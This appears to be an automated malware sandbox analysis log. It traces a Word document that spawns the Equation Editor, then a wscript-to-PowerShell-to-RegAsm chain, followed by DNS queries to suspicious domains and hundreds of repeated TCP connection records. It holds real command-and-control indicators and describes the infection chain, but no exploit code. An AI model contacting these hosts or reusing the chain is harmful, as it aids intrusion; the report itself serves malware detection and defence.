                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 0000000C.00000002.411646477.00000000003A9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,14_2_0040928E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,14_2_0041C322
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,14_2_0040C388
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,14_2_004096A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,14_2_00408847
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00407877 FindFirstFileW,FindNextFileW,14_2_00407877
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0044E8F9 FindFirstFileExA,14_2_0044E8F9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,14_2_0040BB6B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW,14_2_00419B86
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,14_2_0040BD72
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,14_2_100010F1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_10006580 FindFirstFileExA,14_2_10006580
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0040AE51 FindFirstFileW,FindNextFileW,15_2_0040AE51
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,16_2_00407EF8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 18_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,18_2_00407898
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00407CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,14_2_00407CD2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Caches\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Jump to behavior

                  Software Vulnerabilities

                  barindex
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                  Source: C:\Windows\SysWOW64\wscript.exeChild: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeChild: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                  Source: global trafficDNS query: name: og1.in
                  Source: global trafficDNS query: name: og1.in
                  Source: global trafficDNS query: name: og1.in
                  Source: global trafficDNS query: name: og1.in
                  Source: global trafficDNS query: name: og1.in
                  Source: global trafficDNS query: name: og1.in
                  Source: global trafficDNS query: name: og1.in
                  Source: global trafficDNS query: name: raw.githubusercontent.com
                  Source: global trafficDNS query: name: maxert.wemnbbsweoipmngbyutrdcunbgrtjeroendns.pro
                  Source: global trafficDNS query: name: geoplugin.net
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 178.237.33.50:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.78.54:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.78.54:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.78.54:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.78.54:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.78.54:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.78.54:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.78.54:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.78.54:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.78.54:443
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.78.54:443
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.78.54:443
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.78.54:443
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.78.54:443
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.78.54:443
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.78.54:443
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.78.54:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.21.78.54:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.21.78.54:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.21.78.54:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.21.78.54:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.21.78.54:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.21.78.54:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.21.78.54:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
